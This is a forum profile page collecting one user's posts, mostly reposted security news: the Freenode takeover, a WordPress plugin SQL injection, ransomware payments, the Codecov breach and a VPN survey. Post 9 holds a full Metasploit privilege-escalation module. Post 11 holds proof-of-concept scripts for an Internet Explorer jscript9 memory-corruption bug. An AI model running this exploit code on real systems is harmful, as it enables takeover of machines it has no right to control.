Jump to content

Kev

Active Members
  • Posts

    1026
  • Joined

  • Days Won

    55

Everything posted by Kev

  1. Kev

    UFO and stuff

    eu le-as numi drone, iar unul dintre primele proiecte a fost a lui Aurel Vlaicu care nu a fost finalizat din motivul asasinarii lui
  2. Freenode IRC staff resign en masse after takeover by Korea’s “crown prince” Former staffer alleges "a hostile entity is now in control... and has your data." Freenode currently ranges between roughly 75,000 and 90,000 users—that's a far cry from the 240,000 users fellow IRC network QuakeNet had back in 2005, but it's still quite a lot of people. Freenode has been the world's largest IRC network since 2013, with roughly three times as many users as its closest competitor, IRCnet. Last week, the massive IRC network was taken over by tech entrepreneur and "Korean Crown Prince" Andrew Lee—a move that the network's staff has apparently unanimously classified as a "hostile takeover," although Lee himself claims these are only "rumors" and "simply untrue." At first blush, it's tempting for an outside observer—someone who isn't already familiar with the history of the network's ownership and management—to shrug and say "well, who knows." Lee lays out several hundred words of explanation in a blog post currently featured on Freenode's front page—most of which sounds reasonable. But the one question Lee never addresses—let alone answers—is why at least 14 separate staff members would quit en masse, all disagreeing with the story he tells. A dubious contract In 2017, Christel Dahlskjaer—who was, at the time, head of Freenode staff—created a corporation, Freenode Ltd., which she immediately sold to Lee. Dahlskjaer and Lee told Freenode staff and users that the incorporation was only done as necessary paperwork in order to sponsor a conference and that day-to-day operations would remain unchanged. Contract or no contract, staff and developers of Freenode maintain that it wasn't actually possible to sell the network—the staff is all volunteers, and the infrastructure itself wasn't owned by Dahlskjaer in the first place. According to resigning Freenode developer Aaron Jones, however, "Andrew has more money than us, and so we cannot fight this." Although the contract in question was signed in 2017, staffers didn't begin objecting until this year, when operational changes began appearing without their control or consent. A unilateral decision on advertising In February 2021, Dahlskjaer placed the logo for Shells—a Lee-owned company offering cloud-based virtual desktops—prominently on Freenode's front page. By itself, this might seem innocuous—FOSS projects accept sponsorships and advertising all the time. But staffers, who were supposedly still in control of the network, weren't consulted about the arrangement—and they did not approve. One reason for staffers' virulent disapproval is Shells CTO Mark Karpelès. Karpelès is the founder of the defunct Mt. Gox bitcoin exchange, which lost nearly 850,000 bitcoin (currently worth a staggering $33.4 billion-with-a-B US dollars) to attackers who exploited a massive security flaw. Karpelès was found guilty in a Tokyo court of deliberately tampering with records to cover up the exchange's various losses, although he was found innocent of outright embezzlement. As former staffer Aaron Jones explains in his lengthy letter of resignation—which links to similar announcements from other departing high-profile staffers—this wasn't the only issue with the new ad. According to Jones, sponsorships are normally only found at freenode.net/acknowledgements—making the prominent Shells logo in the upper right of Freenode's front page more of a departure from the norm than it might seem. Jones goes on to say that Dahlskjaer was either unable or unwilling to explain the sudden new ad to staffers, choosing to resign instead. (Lee claims that Freenode staff "harassed" Dahlskjaer into resignation; Jones and other departing staffers deny this characterization.) Freenode staff elected Tom Wesley (aka tomaw) to replace her. Escalation in April Beginning in April 2021, Lee's exercise of control continued ramping up: Staffers created a blog post outlining changes in leadership and announcing a change to newly developed back-end ircd software Solanum. According to Jones, Lee summarily removed the post—and manually edited the website's built-in history to create the impression that it had never existed. Later in April, a Freenode test network—in use to get ready for the infrastructure shift to Solanum—was shut down without discussion. Wesley (tomaw) performed the shutdown and refused to say why; Jones and others believe Lee was behind the shutdown, used threat of legal force to make Wesley comply, and issued related gag orders to OFTC staff. Lee registered the channel #freenode-board without discussing it with staff—and, according to Jones, without proper authority (since only official group contacts are allowed to create channels in Freenode's primary namespace, and Lee was not an official Freenode contact). Shane Allen (aka nirvana), an associate and employee of Lee's, bragged about "turning" tomaw, and he attempted to bribe prominent user Ariadne with promises of ops privileges, saying, "I'll make sure you get +o0 in #freenode so you can kick people. My gift to you pal." On May 11, Lee began issuing notices to staff as a group and directly to individual Freenode staffers. Everything came from "the board"—an entity that staffers say never existed, and even now is merely a euphemism for Lee himself. On May 12, Lee (aka rasengan) posted his version of events—in which he claims legal ownership of Freenode, along with a list of grievances—in a Github gist. (The gist is considerably saltier than the version of events Lee posted to Freenode's public-facing blog a week later.) Libera Chat A week after Lee's effectively public announcement of ownership and de facto dictatorial operation of Freenode, the staffers who resigned from Freenode created Libera.chat as a replacement. Libera Chat is incorporated as a Swedish nonprofit organization, owned and operated by volunteer staffers who are voting members of the organization. It has a small, member-elected board—currently consisting of chair, treasurer, projects and community rep, engineering rep/vice chair, and operations rep. But most decisions are to be taken by the membership as a whole. The membership also elects two auditors, tasked with auditing the board's actions on behalf of the membership. A transparency report is to be published annually, detailing bookkeeping and the auditors' findings along with the standard annual report from the board itself. All current Libera Chat boardmembers and auditors are Freenode staffers who resigned in protest of Lee's recent actions and assumption of control. Via arstechnica.com
  3. Salut M-am indexat in toate motoarele: Bing , Google..etc cu un meta "free html/css template", am editat tot site-ul inclusiv (c) , de 4-5 zile este up cu acelasi tag. Ce pot face? Multumesc anticipat
  4. ^ off si eu :taie-i sa invete sa citeasca indianul on: interesanti parametrii oricum e fixed
  5. Kev

    macOCR

    macOCR is a command line app that enables you to turn any text on your screen into text on your clipboard. When you envoke the ocr command, a "screen capture" like cursor is shown. Any text within the bounds will be converted to text. You could invoke the app using the likes of Alfred.app, Hammerspoon, Quicksilver etc. An example Alfred.app workflow is available here. If you're still wondering "how does this work ?", I always find the .gif is the best way to clarify things: Installation Compile the code in this repo, or download a prebuilt binary (Apple Silicon, Intel) and put it on your path. Apple Silicon Install: curl -O https://files.littlebird.com.au/ocr.zip; unzip ocr.zip; sudo cp ocr /usr/local/bin; Intel Install: curl -O https://files.littlebird.com.au/ocr-EPiReQzFJ5Xw9wElWMqbiBayYLVp.zip; unzip ocr-EPiReQzFJ5Xw9wElWMqbiBayYLVp.zip; sudo cp ocr /usr/local/bin; When running the app the first time, you will likely be asked to allow the app access to your screen. OS Support This should run on Catalina and above. Who made this? macOCR was made by Marcus Schappi. I create software (and even hardware) to automate ecommerce, including: Chick Commerce. This free Australia Post app on Shopify. Script Ninja which enables you to create powerful scripts and tools to automate your Shopify store. Thoughts on Sherlocking? Apple, please sherlock this software! MIT License Copyright 2021 Marcus Schappi Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. Download macOCR-master.zip or git clone https://github.com/schappim/macOCR.git Source
  6. The plugin, installed on hundreds of thousands of sites, allows anyone to filch database info without having to be logged in. WP Statistics, a plugin installed on more than 600,000 WordPress websites, has an SQL-injection security vulnerability that could let site visitors make off with all kinds of sensitive information from web databases, including emails, credit-card data, passwords and more. WP Statistics, as its name suggests, is a plugin that delivers analytics for site owners, including how many people visit the site, where they’re coming from, what browsers and search engines they use, and which pages, categories and tags have the most visits. It also delivers anonymized data around IP addresses, referring sites, and country- and city-level details for visitors, all presented in the form of charts and graphs. Wordfence researchers found the high-severity bug (tracked as CVE-2021-24340, rating 7.5 out of 10 on the CVSS scale) in the “Pages” function, which lets administrators see which pages have received the most traffic. It returns this data using SQL queries to a back-end database – but it turns out that unauthenticated attackers can hijack the function to perform their own queries, in order to purloin sensitive information. The specific vulnerability is a time-based blind SQL injection, according to researchers at Wordfence. This technique involves sending requests to the database that “guess” at the content of a database table and instruct the database to delay the response or “sleep” if that guess is correct. For instance, an attacker could ask the database if the first letter of the admin user’s email address starts with the letter “A,” and instruct it to delay the response by five seconds if this is true. The only reliable method of preventing SQL injection is to prepare all SQL statements before executing them, researchers added. Prepared statements isolate each query parameter so that an adversary would not be able to see the entire scope of the data that’s returned. VeronaLabs, the plugin’s developer, has released a patch with version 13.0.8, so site administrators should update as quickly as possible. A similar bug was found earlier in May, which impacted the “Spam protection, AntiSpam, FireWall by CleanTalk” plugin, which is installed on more than 100,000 sites. It too allowed adversaries to use the time-based bling SQL approach, also without having to be logged on to mount an attack. Via threatpost.com
  7. The CNA headquarters in Chicago. Photographer: AYNSLEY FLOYD/Bloomberg CNA Financial Corp., among the largest insurance companies in the U.S., paid $40 million in late March to regain control of its network after a ransomware attack, according to people with knowledge of the attack. The Chicago-based company paid the hackers about two weeks after a trove of company data was stolen, and CNA officials were locked out of their network, according to two people familiar with the attack who asked not to be named because they weren’t authorized to discuss the matter publicly. In a statement, a CNA spokesperson said the company followed the law. She said the company consulted and shared intelligence about the attack and the hacker’s identity with the FBI and the Treasury Department’s Office of Foreign Assets Control, which said last year that facilitating ransom payments to hackers could pose sanctions risks. In a security incident update published on May 12, CNA said it did “not believe that the systems of record, claims systems, or underwriting systems, where the majority of policyholder data – including policy terms and coverage limits – is stored, were impacted.” Ransomware attacks -- and particularly payments -- are rarely disclosed so it’s difficult to know what the biggest ransoms have been. The average payment in 2020 was $312,493, according to Palo Alto Networks, a 171% increase over the previous year. The $40 million payment is bigger than any previously disclosed payments to hackers, according to three people familiar with ransomware negotiations. The CNA hackers used malware called Phoenix Locker, a variant of ransomware dubbed ‘Hades.’ Hades was created by a Russian cybercrime syndicate known as Evil Corp., according to cybersecurity experts. Evil Corp. was sanctioned by the U.S. in 2019. However, attributing attacks can be difficult because hacking groups can share code or sell malware to one another. CNA, which offers cyber insurance, said its investigation concluded that the hackers were a group called Phoenix that isn’t subject to U.S. sanctions. Disclosure of the payment is likely to draw the ire of lawmakers and regulators already unhappy that U.S. companies are making large payouts to criminal hackers who over the last year have targeted hospitals, drug makers, police forces and other entities critical to public safety. The FBI discourages organizations from paying ransom because it encourages additional attacks and doesn’t guarantee data will be returned. Ransomware is a type of malware that encrypts a victim’s data. Cybercriminals using ransomware often steal the data too. The hackers then ask for a payment to unlock the files and promise not to leak stolen data. In recent years, hackers have been targeting victims with cyber insurance policies and huge volumes of sensitive consumer data that make them more likely to pay a ransom, according to cybersecurity experts. Last year was a banner year for ransomware groups, according to a task-force of security experts and law enforcement agencies which estimated that victims paid about $350 million in ransom last year, a 311% increase over 2019. The task force recommended 48 actions that the Biden administration and private sector could take to mitigate such attacks, including better regulation of the digital currency market used to make ransom payments. The report, prepared by the Institute for Security and Technology, was delivered to the White House days before Colonial Pipeline Co. was compromised in a ransomware attack that led to fuel shortages and long lines at gas stations along the East Coast of the U.S. Bloomberg reported that Colonial paid the hackers nearly $5 million shortly after the attack; Colonial Chief Executive Officer Joseph Blount, in an interview with the Wall Street Journal published on Wednesday, confirmed that the company paid the hackers -- $4.4 million in ransom. Colonial Pipeline Paid Hackers Nearly $5 Million in Ransom According to the two people familiar with the CNA attack, the company initially ignored the hackers’ demands while pursuing options to recover their files without engaging with the criminals. But within a week, the company decided to start negotiations with the hackers, who were demanding $60 million. Payment was made a week later, according to the people. Via bloomberg.com
  8. WunderGraph Realtime Chat Example using NextJS, TypeScript & PostgreSQL Description This Example demonstrates how to build a production-grade Realtime Chat application by writing two GraphQL Queries. Features: Authentication Authorization Realtime Updates Cross Tab Login/Logout typesafe generated Typescript Client Prerequisites Make sure you have docker compose installed. Alternatively, you can use any PostgreSQL database available on localhost. Getting Started Install the dependencies and run the example: yarn global add @wundergraph/wunderctl@latest yarn yarn dev Questions? Read the Docs. Join us on Discord! Download: nextjs-typescript-postgresql-realtime-chat-main.zip or git clone https://github.com/wundergraph/nextjs-typescript-postgresql-realtime-chat.git Source
  9. This Metasploit module leverages a UAC bypass (TokenMagic) in order to spawn a process/conduct a DLL hijacking attack to gain SYSTEM-level privileges. Windows 7 through Windows 10 1803 are affected. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE # Needed for generate_payload_dll include Msf::Exploit::FileDropper include Msf::Post::File include Msf::Post::Windows::FileSystem include Msf::Post::Windows::Powershell include Msf::Post::Windows::Priv include Msf::Post::Windows::ReflectiveDLLInjection prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Windows Privilege Escalation via TokenMagic (UAC Bypass)', 'Description' => %q{ This module leverages a UAC bypass (TokenMagic) in order to spawn a process/conduct a DLL hijacking attack to gain SYSTEM-level privileges. Windows 7 through Windows 10 1803 are affected. }, 'License' => MSF_LICENSE, 'Author' => [ 'James Forshaw', # Research 'Ruben Boonen (@FuzzySec)', # PoC 'bwatters-r7', # msf module 'jheysel-r7' # msf module ], 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Targets' => [ [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X64 ] } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => '2017-05-25', 'References' => [ ['URL', 'https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1'], ['URL', 'https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html'], ['URL', 'https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html'], ['URL', 'https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-3.html'] ], 'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ], 'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp', 'WfsDelay' => 900 } ) ) register_options([ OptString.new('SERVICE_NAME', [false, 'Service Name to use (Random by default).', Rex::Text.rand_text_alpha(5..9)]), OptString.new('WRITABLE_DIR', [false, 'Directory to write file to (%TEMP% by default).', nil]), OptString.new('SERVICE_FILENAME', [false, 'Filename for Service Payload (Random by default).', Rex::Text.rand_text_alpha(5..9)]), OptEnum.new('METHOD', [ true, 'SERVICE or DLL, please select which attack method you would like to use (SERVICE by default). Note that the System Orchestrator service which loads the overwritten DLL when using the DLL method can take up to 10 minutes to trigger', 'SERVICE', ['SERVICE', 'DLL'] ]) ]) end def setup_process begin print_status('Launching notepad to host the exploit...') notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true) process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS) print_good("Process #{process.pid} launched.") rescue Rex::Post::Meterpreter::RequestError # Sandboxes could not allow to create a new process # stdapi_sys_process_execute: Operation failed: Access is denied. print_error('Operation failed. Trying to elevate the current process...') process = client.sys.process.open end process end def inject_magic(process) if sysinfo['Architecture'] == ARCH_X64 library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'uso_trigger', 'uso_trigger.x64.dll') elsif sysinfo['Architecture'] == ARCH_X86 library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'uso_trigger', 'uso_trigger.x86.dll') end library_path = ::File.expand_path(library_path) print_status("Reflectively injecting the trigger DLL into #{process.pid}...") dll = ::File.read(library_path) exploit_mem, offset = inject_dll_data_into_process(process, dll) print_good('Trigger injected.') payload_mem = inject_into_process(process, payload.encoded) print_good('Payload injected. Starting thread...') process.thread.create(exploit_mem + offset, payload_mem) end def launch_dll_trigger print_status('Trying to start notepad') process = setup_process inject_magic(process) print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.') rescue Rex::Post::Meterpreter::RequestError => e elog(e) print_error(e.message) end def payload_arch payload.arch.include?(ARCH_X64) ? ARCH_X64 : ARCH_X86 end def exploit win_dir = session.sys.config.getenv('windir') cmd_path = "#{win_dir}\\system32\\cmd.exe" if datastore['SERVICE_FILENAME'] service_filename = datastore['SERVICE_FILENAME'] else service_filename = Rex::Text.rand_text_alpha(5..9) end service_filename = "#{service_filename}.exe" unless service_filename.end_with?('.exe') if datastore['SERVICE_NAME'] service_name = datastore['SERVICE_NAME'] else service_name = Rex::Text.rand_text_alpha(5..9) end if datastore['WRITABLE_DIR'] writable_dir = datastore['WRITABLE_DIR'] else writable_dir = session.sys.config.getenv('TEMP') end if datastore['METHOD'] =~ /DLL/i bin_path = "#{writable_dir}\\WindowsCoreDeviceInfo.dll" payload = generate_payload_dll vprint_status("Payload DLL is #{payload.length} bytes long") client.core.use('powershell') unless client.ext.aliases.include?('powershell') register_file_for_cleanup('C:\\Windows\\System32\\WindowsCoreDeviceInfo.dll') # Register this file for cleanup so that if we fail, then the file is cleaned up. # Replace Value in Generic Script. cmd_args = "/c move #{bin_path} C:\\Windows\\System32\\WindowsCoreDeviceInfo.dll" else bin_path = "#{writable_dir}\\#{service_filename}" payload = generate_payload_exe_service({ servicename: service_name, arch: payload_arch }) vprint_status("Service Name = #{service_name}") client.core.use('powershell') unless client.ext.aliases.include?('powershell') # Replace Value in Generic Script. Note Windows 7 requires spaces after the equal signs in the below command. cmd_args = "/c sc create #{service_name} binPath= #{bin_path} type= own start= demand && sc start #{service_name}" end # Check target print_status('Checking Target') validate_active_host validate_payload # Upload the payload print_status("Uploading payload to #{bin_path}") write_file(bin_path, payload) register_file_for_cleanup(bin_path) # Read in Generic Script script = exploit_data('tokenmagic', 'tokenmagic.ps1') script.gsub!('_CMD_PATH_', cmd_path) script.gsub!('_CMD_ARGS_', cmd_args) # Run Exploit Script print_status("Running Exploit on #{sysinfo['Computer']}") begin print_status('Executing TokenMagic PowerShell script') session.powershell.execute_string({ code: script }) rescue Rex::TimeoutError => e elog('Caught timeout. Exploit may be taking longer or it may have failed.', error: e) print_error('Caught timeout. Exploit may be taking longer or it may have failed.') end if datastore['METHOD'] =~ /DLL/i launch_dll_trigger print_status("Note that the System Orchestrator service which loads the overwritten DLL when using the DLL method can take up to 10 minutes to trigger and recieve a shell.") end print_good('Enjoy the shell!') end def validate_active_host print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}") rescue Rex::Post::Meterpreter::RequestError => e elog('Could not connect to session', error: e) raise Msf::Exploit::Failed, 'Could not connect to session' end def validate_payload vprint_status("Target Arch = #{sysinfo['Architecture']}") vprint_status("Payload Arch = #{payload.arch.first}") unless payload.arch.first == sysinfo['Architecture'] fail_with(Failure::NoTarget, 'Payload arch must match target arch') end end def check sysinfo_value = sysinfo['OS'] build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/) if build_num.nil? return CheckCode::Unknown("Couldn't retrieve the target's build number!") else vprint_status("Target's build number: #{build_num}") build_num = build_num[0].to_i end vprint_status("Build Number = #{build_num}") if datastore['METHOD'] =~ /service/i # Service method has been tested on Windows 7, 8 and 10 (1803 and ealier) return Exploit::CheckCode::Appears if (build_num >= 7600 && build_num <= 17134) elsif (sysinfo_value =~ /10/ && build_num >= 15063 && build_num <= 17134) # DLL method has been tested on Windows 10 (1703 to 1803) return Exploit::CheckCode::Appears elsif (datastore['METHOD'] =~ /dll/i && build_num >= 7600 && build_num < 15063) print_error("The current target is not vulnerable to the DLL hijacking technique. Please try setting METHOD to 'SERVICE' and then try again!") end Exploit::CheckCode::Safe end end Source
  10. Ireland's health services are still recovering from a ransomware attack, but hackers shouldn't expect their demands to be met. Rapid7 has disclosed the compromise of customer data and partial source code due to the Codecov supply chain attack. On Thursday, the cybersecurity firm said it was one of the victims of the incident, in which an attacker obtained access to the Codecov Bash uploader script. The cyberattack against Codecov took place on or around January 31, 2021, and was made public on April 15. The organization, which provides code coverage and testing tools, said that a threat actor tampered with the Bash uploader script, thereby compromising the Codecov-actions uploader for GitHub, Codecov CircleCl Orb, and the Codecov Bitrise Step. This enabled attackers to export data contained in user continuous integration (CI) environments. Hundreds of clients were potentially impacted, and now, Rapid7 has confirmed that the company was one of them. Rapid7 says the Bash uploader was used in a limited fashion as it was only set up on a single CI server used to test and build tooling internally for the Managed Detection and Response (MDR) service. As such, the attacker was kept away from product code, but they were able to access a "small subset of source code repositories" for MDR, internal credentials -- all of which have now been rotated -- and alert-related data for some MDR customers. Rapid7 has reached out to customers impacted by the data breach. The company pulled in cyberforensics assistance and following an investigation, has concluded that no other corporate systems or production environments were compromised. Codecov has since removed the unauthorized actor from its systems and is setting up monitoring and auditing tools to try and prevent another supply chain attack from occurring in the future. Impacted customers were notified via email addresses on record and through the Codecov app. Codecov recommends that users of the Bash uploaders between January 31, 2021, and April 1, 2021, who did not perform a checksum validation should re-roll their credentials out of caution. Via zdnet.com
  11. There is a vulnerability in jscript9 that could be potentially used by an attacker to execute arbitrary code when viewing an attacker-controlled website in Internet Explorer. The vulnerability has been confirmed on Windows 10 64-bit with the latest security patches applied. Internet Explorer: Memory corruption in jscript9.dll related to scope of the arguments object There is a vulnerability in jscript9 that could be potentially used by an attacker to execute arbitrary code when viewing attacker-controlled website in Internet Explorer. The vulnerability has been confirmed on Windows 10 64-bit with the latest security patches applied. The following minimal sample is sufficient to trigger the bug: ############################################################ <!-- saved from url=(0014)about:internet --> <script> function main() { function v4(v5,v6) { with ({}) { arguments(); } } for(var i=0; i <1; i++) v4(1); } alert('start'); main(); alert('end'); </script> ############################################################ When this sample is opened with Internet Explorer, it crashes inside jscript9!Js::JavascriptFunction::CallFunction<1> when dereferencing memory pointed to by eax. jscript9!Js::JavascriptFunction::CallFunction<1>+0x39: 68c2d6e9 8bb850020000 mov edi,dword ptr [eax+250h] ds:002b:00000250=???????? On the first glance, it might look like a null pointer dereference, however the value of eax in this case was read from uninitialized memory. There are also different ways to trigger the crash when accessing the arguments object. The following sample demonstrates a crash when reading from a controllable address: ############################################################ <!-- saved from url=(0014)about:internet --> <script> function test() { test.caller.arguments.length = (0x13371337>>1); } function main() { function v4(v5,v6) { test(); with ({}) { arguments.length; arguments(); } } for(var i=0; i <1; i++) v4(1); } alert('start'); main(); alert('end'); </script> ############################################################ This sample crashes in Js::JavascriptOperators::GetProperty_Internal when dereferencing address 0x13371337+40h: jscript9!Js::JavascriptOperators::GetProperty_Internal<0>+0x35: 68b578b5 8b7840 mov edi,dword ptr [eax+40h] ds:002b:13371377=???????? The value read this way is used as a function pointer, thus demonstrating the vulnerability could be used for code execution. I haven't done the full root cause analysis (it will be easier to do with proper debug tooling for jscript9), but in both cases, the operations on 'arguments' object end up being performed on incorrect data. I suspect this is related to changing the scope, e.g. accessing an object at an incorrect stack slot due to scope change. Another possibility could be an incorrectly initialized arguments object or the corresponding local variable. Full debug log: ############################################################ (1654.14e8): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=13371337 ebx=0910bbe0 ecx=0910bbe0 edx=0910bbe0 esi=092b8240 edi=00000000 eip=68b578b5 esp=053bc578 ebp=053bc590 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 jscript9!Js::JavascriptOperators::GetProperty_Internal<0>+0x35: 68b578b5 8b7840 mov edi,dword ptr [eax+40h] ds:002b:13371377=???????? 0:009> k # ChildEBP RetAddr 00 053bc590 68b69075 jscript9!Js::JavascriptOperators::GetProperty_Internal<0>+0x35 01 053bc5dc 68b9d19d jscript9!Js::InterpreterStackFrame::OP_ProfiledLdLen<Js::OpLayoutReg2_OneByte>+0x1f5 02 053bc608 68b9c102 jscript9!Js::InterpreterStackFrame::Process+0x7fd 03 053bc744 0b9a0fd9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x242 WARNING: Frame IP not in any known module. Following frames may be wrong. 04 053bc750 68c2d743 0xb9a0fd9 05 053bc798 68b9ff61 jscript9!Js::JavascriptFunction::CallFunction<1>+0x93 06 053bc7c8 68b9cb53 jscript9!Js::InterpreterStackFrame::OP_ProfiledCallI<Js::OpLayoutCallI_OneByte>+0x121 07 053bc7f8 68b9c102 jscript9!Js::InterpreterStackFrame::Process+0x1b3 08 053bc934 0b9a0fe1 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x242 09 053bc940 68c2d743 0xb9a0fe1 0a 053bc988 68b9ff61 jscript9!Js::JavascriptFunction::CallFunction<1>+0x93 0b 053bc9b8 68b9cb53 jscript9!Js::InterpreterStackFrame::OP_ProfiledCallI<Js::OpLayoutCallI_OneByte>+0x121 0c 053bc9e8 68b9c102 jscript9!Js::InterpreterStackFrame::Process+0x1b3 0d 053bcb14 0b9a0fe9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x242 0e 053bcb20 68c2d743 0xb9a0fe9 0f 053bcb60 68b4eca9 jscript9!Js::JavascriptFunction::CallFunction<1>+0x93 10 053bcbd4 68b4ebbc jscript9!Js::JavascriptFunction::CallRootFunctionInternal+0xb5 11 053bcc2c 68b4eb56 jscript9!Js::JavascriptFunction::CallRootFunction+0x4d 12 053bcc74 68b4eabd jscript9!ScriptSite::CallRootFunction+0x42 13 053bccb0 68b5256e jscript9!ScriptSite::Execute+0xae 14 053bcd48 68b4e9aa jscript9!ScriptEngine::ExecutePendingScripts+0x1bf 15 053bcde0 68c27cca jscript9!ScriptEngine::ParseScriptTextCore+0x32c 16 053bce30 695a9cc1 jscript9!ScriptEngine::ParseScriptText+0x5a 17 053bce68 694a0493 MSHTML!InitializeLocalHtmlEngine+0x1f11 18 053bcec0 694b7fe7 MSHTML!GetWebPlatformObject+0x16c93 19 053bcf30 694b8493 MSHTML!GetWebPlatformObject+0x2e7e7 1a 053bd01c 694b87be MSHTML!GetWebPlatformObject+0x2ec93 1b 053bd098 694b8146 MSHTML!GetWebPlatformObject+0x2efbe 1c 053bd0b8 694d79d9 MSHTML!GetWebPlatformObject+0x2e946 1d 053bd110 694d6bb9 MSHTML!UninitializeLocalHtmlEngine+0x8b49 1e 053bd134 694d653e MSHTML!UninitializeLocalHtmlEngine+0x7d29 1f 053bd25c 695d4891 MSHTML!UninitializeLocalHtmlEngine+0x76ae 20 053bd27c 695d47fb MSHTML!DllGetClassObject+0x7291 21 053bd29c 695d478d MSHTML!DllGetClassObject+0x71fb 22 053bd2e8 695d46a7 MSHTML!DllGetClassObject+0x718d 23 053bd300 6950dccc MSHTML!DllGetClassObject+0x70a7 24 053bd378 6967d357 MSHTML!TravelLogCreateInstance+0x25cec 25 053bd3c8 69510f32 MSHTML!DllCanUnloadNow+0x13957 26 053bd3e4 76d0ef5b MSHTML!TravelLogCreateInstance+0x28f52 27 053bd410 76d05eca USER32!_InternalCallWinProc+0x2b 28 053bd4f4 76d03c3a USER32!UserCallWinProcCheckWow+0x33a 29 053bd568 76d03a00 USER32!DispatchMessageWorker+0x22a 2a 053bd574 6ad32cd4 USER32!DispatchMessageW+0x10 2b 053bf720 6ad31db3 IEFRAME!Ordinal245+0x1cb4 2c 053bf7e0 6a5bcb2c IEFRAME!Ordinal245+0xd93 2d 053bf7f8 731e26ed msIso+0x1cb2c 2e 053bf830 756cfa29 IEShims!NS_CreateThread::AutomationIE_ThreadProc+0x8d 2f 053bf840 770676b4 KERNEL32!BaseThreadInitThunk+0x19 30 053bf89c 77067684 ntdll!RtlGetAppContainerNamedObjectPath+0xe4 31 053bf8ac 00000000 ntdll!RtlGetAppContainerNamedObjectPath+0xb4 ############################################################ This bug is subject to a 90 day disclosure deadline. After 90 days elapse, the bug report will become visible to the public. The scheduled disclosure date is 2021-05-13. Disclosure at an earlier date is possible if agreed upon by all parties. Related CVE Numbers: CVE-2021-26419. Found by: ifratric@google.com Source
  12. Aceasta metoda se aplica in cazul ransomware, cer sume modice, dar astia sunt prosti de ....
  13. Afirmativ On: Dormi linistit, password-urile nu sunt pe google Edit: din 2016 pana in prezent au fost notificati, majoritatea si-au schimbat parolele, d'asta exista sectiunea Stiri Securitate
  14. There has been a heightened appetite among US consumers for VPN services throughout 2020 and into 2021 Since March 2020 there has been an increase of of VPN (Virtual Private Network) discount-related searches as Americans search for a way to feel secure online, according to a new report. New York, NY-based coupon engine CouponFollow, part of NextGen Shopping surveyed 1,666 US adults before the pandemic and a further 1,834 US adults in February 2021 to understand how Americans view their internet security and data privacy. The report showed that almost seven in ten (69%) of Americans are concerned about the security of their data when using public Wi-fi, and nearly two in three (64%) are worried about it when using the internet at home. A similar percentage (65%) are concerned that their medical or financial data might be shared -- or sold on -- by their ISP. Online privacy worries almost half (47%) of Americans who are concerned about their privacy when using public Wi-Fi. Nearly a third (30%) worry about their privacy even when using the Internet at home. CouponFollow Online fraud and hacking is a concern for Americans with over one in three (35%) knowing someone who has had their social media account hacked or hijacked -- including them. Almost half of Millennials (48%) reported this happening. In October 2020 the UK's data privacy watchdog fined the Marriott hotel chain for a data breach that could have affected up to 339 million guests. Even social media sites like Facebook has suffered data leaks. One in three have had, or know someone who has had their password stolen, and (52%) of Millennials and Gen Z reported the same. Only 12% of Baby Boomers reported having their password stolen, and one in five (20%) had a social media account hacked or hijacked -- reflecting the amount of time they spend online. Although one in three (35%) Americas use a VPN, 33% reported that they do not know what a VPN is. Men are more likely to know what a VPN is, but almost half of Baby Boomers (49%) do not know what a VPN is. Even two in five (40%) of VPN users do not understand what the term VPN means. CouponFollow Using the internet at work does not seem to elicit the same level of concern. This could be due to the levels of antivirus and firewall protections that their employer has implemented on their devices. Perhaps it is due to the type of sites that people browse on their work devices, here, less than one in three (32%) are worried about their security. Less than one in five (18%) are concerned about their privacy when browsing the web from a work device. Over one in ten (12%) started to use a VPN in 2020, and one in five (21%) installed a VPN to enable them to work from home. Up to 35% of Americans already use a VPN for anonymous browsing (45%), work access (45%), or for shopping online (21%). Only 12% use it for Torrenting or P2P file sharing. As hacking attempts and breaches grow Americans have good reason to be cautious. Parler's data leak exposed millions of posts as 70TB of data was scraped from the platform, and The ParkMobile app data breach exposed data from 21 million users. Being ultra-careful online will be the only way to avoid being a victim of the next breach. Via zdnet.com
